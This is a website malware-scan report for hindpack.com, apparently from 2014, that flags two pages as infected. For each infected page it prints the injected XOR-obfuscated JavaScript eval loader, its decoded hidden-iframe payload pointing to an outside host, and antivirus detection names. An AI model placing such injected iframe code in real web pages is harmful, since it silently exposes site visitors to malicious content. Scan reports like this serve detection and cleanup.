New scan:

Malware Scanner report for hindpack.com

Malicious/Suspicious/Total urls checked
2/0/11
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://hindpack.com/
200 OK
Content-Length: 14199
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ooflggbaouejrkvgjzi(cyjlpylskm, bcumjcojskoccazi) { var zrlcpvngubagno = ""; var rkvbnklgvbjyc = ""; for (var hmiazlrvazpczy = 0 ; hmiazlrvazpczy < cyjlpylskm.length; ++hmiazlrvazpczy) { rkvbnklgvbjyc = cyjlpylskm.charCodeAt(hmiazlrvazpczy); zrlcpvngubagno += String.fromCharCode(bcumjcojskoccazi ^ rkvbnklgvbjyc); } return zrlcpvngubagno; } eval(ooflggbaouejrkvgjzi("\x31\x7e\x6e\x7f\x64\x7d\x79\x33\x69\x62\x6e\x78\x60\x68\x63\x79\x23\x7a\x7f\x64\x79\x68\x25\x2a\x31\x64\x6b\x7f\x6c\x60
... 8 bytes are skipped ...
\x63\x6c\x60\x68\x30\x7b\x35\x2d\x7e\x7f\x6e\x30\x51\x2a\x65\x79\x79\x7d\x37\x22\x22\x6f\x68\x7e\x79\x7e\x62\x61\x61\x23\x6e\x62\x60\x22\x6b\x62\x7f\x78\x60\x22\x6a\x62\x23\x7d\x65\x7d\x32\x7e\x64\x69\x30\x3f\x51\x2a\x2d\x7a\x64\x69\x79\x65\x30\x3f\x34\x2d\x65\x68\x64\x6a\x65\x79\x30\x3c\x3e\x3c\x2d\x7e\x79\x74\x61\x68\x30\x51\x2a\x7b\x64\x7e\x64\x6f\x64\x61\x64\x79\x74\x37\x65\x64\x69\x69\x68\x63\x51\x2a\x33\x31\x22\x64\x6b\x7f\x6c\x60\x68\x33\x2a\x24\x31\x22\x7e\x6e\x7f\x64\x7d\x79\x33", 13));

Decoded script:


document.write('<iframe name=v8 src=\'http://bestsoll.com/forum/go.php?sid=2\' width=29 height=131 style=\'visibility:hidden\'></iframe>')
document.write('<iframe name=v8 src=\'http://bestsoll.com/forum/go.php?sid=2\' width=29 height=131 style=\'visibility:hidden\'></iframe>')

Antivirus reports:

K7AntiVirus
Riskware
Comodo
TrojWare.JS.Iframe.DH
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
SCRIPT.Virus
F-Prot
JS/IFrame.LT.gen
Sophos
Mal/Iframe-F
Commtouch
JS/IFrame.LT.gen

http://hindpack.com/aboutus.html
200 OK
Content-Length: 11195
Content-Type: text/html
clean
http://hindpack.com/index.html
200 OK
Content-Length: 14199
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ooflggbaouejrkvgjzi(cyjlpylskm, bcumjcojskoccazi) { var zrlcpvngubagno = ""; var rkvbnklgvbjyc = ""; for (var hmiazlrvazpczy = 0 ; hmiazlrvazpczy < cyjlpylskm.length; ++hmiazlrvazpczy) { rkvbnklgvbjyc = cyjlpylskm.charCodeAt(hmiazlrvazpczy); zrlcpvngubagno += String.fromCharCode(bcumjcojskoccazi ^ rkvbnklgvbjyc); } return zrlcpvngubagno; } eval(ooflggbaouejrkvgjzi("\x31\x7e\x6e\x7f\x64\x7d\x79\x33\x69\x62\x6e\x78\x60\x68\x63\x79\x23\x7a\x7f\x64\x79\x68\x25\x2a\x31\x64\x6b\x7f\x6c\x60
... 8 bytes are skipped ...
\x63\x6c\x60\x68\x30\x7b\x35\x2d\x7e\x7f\x6e\x30\x51\x2a\x65\x79\x79\x7d\x37\x22\x22\x6f\x68\x7e\x79\x7e\x62\x61\x61\x23\x6e\x62\x60\x22\x6b\x62\x7f\x78\x60\x22\x6a\x62\x23\x7d\x65\x7d\x32\x7e\x64\x69\x30\x3f\x51\x2a\x2d\x7a\x64\x69\x79\x65\x30\x3f\x34\x2d\x65\x68\x64\x6a\x65\x79\x30\x3c\x3e\x3c\x2d\x7e\x79\x74\x61\x68\x30\x51\x2a\x7b\x64\x7e\x64\x6f\x64\x61\x64\x79\x74\x37\x65\x64\x69\x69\x68\x63\x51\x2a\x33\x31\x22\x64\x6b\x7f\x6c\x60\x68\x33\x2a\x24\x31\x22\x7e\x6e\x7f\x64\x7d\x79\x33", 13));

Decoded script:


document.write('<iframe name=v8 src=\'http://bestsoll.com/forum/go.php?sid=2\' width=29 height=131 style=\'visibility:hidden\'></iframe>')
document.write('<iframe name=v8 src=\'http://bestsoll.com/forum/go.php?sid=2\' width=29 height=131 style=\'visibility:hidden\'></iframe>')

Antivirus reports:

K7AntiVirus
Riskware
Comodo
TrojWare.JS.Iframe.DH
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
SCRIPT.Virus
F-Prot
JS/IFrame.LT.gen
Sophos
Mal/Iframe-F
Commtouch
JS/IFrame.LT.gen

http://hindpack.com/plant.html
200 OK
Content-Length: 10576
Content-Type: text/html
clean
http://hindpack.com/qualityassurance.html
200 OK
Content-Length: 10686
Content-Type: text/html
clean
http://hindpack.com/products.html
200 OK
Content-Length: 11049
Content-Type: text/html
clean
http://hindpack.com/contactus.html
200 OK
Content-Length: 8501
Content-Type: text/html
clean
http://hindpack.com/enquiryform.html
200 OK
Content-Length: 28665
Content-Type: text/html
clean
http://hindpack.com/disclaimer.html
200 OK
Content-Length: 14967
Content-Type: text/html
clean
http://hindpack.com/terms.html
200 OK
Content-Length: 16154
Content-Type: text/html
clean
http://hindpack.com/test404page.js
404 Not Found
Content-Length: 5193
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hindpack.com

Result:
HTTP/1.1 200 OK
Date: Sat, 12 Jul 2014 13:31:00 GMT
Accept-Ranges: bytes
ETag: "72569d93febcd1:0"
Server: Microsoft-IIS/7.0
Content-Length: 14199
Content-Type: text/html
Last-Modified: Sat, 05 Jan 2013 06:40:39 GMT
X-Powered-By: ASP.NET

...14199 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hindpack.com
Referer: http://www.google.com/search?q=hindpack.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hindpack.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hindpack.com/

Result: hindpack.com is not infected or malware details are not published yet.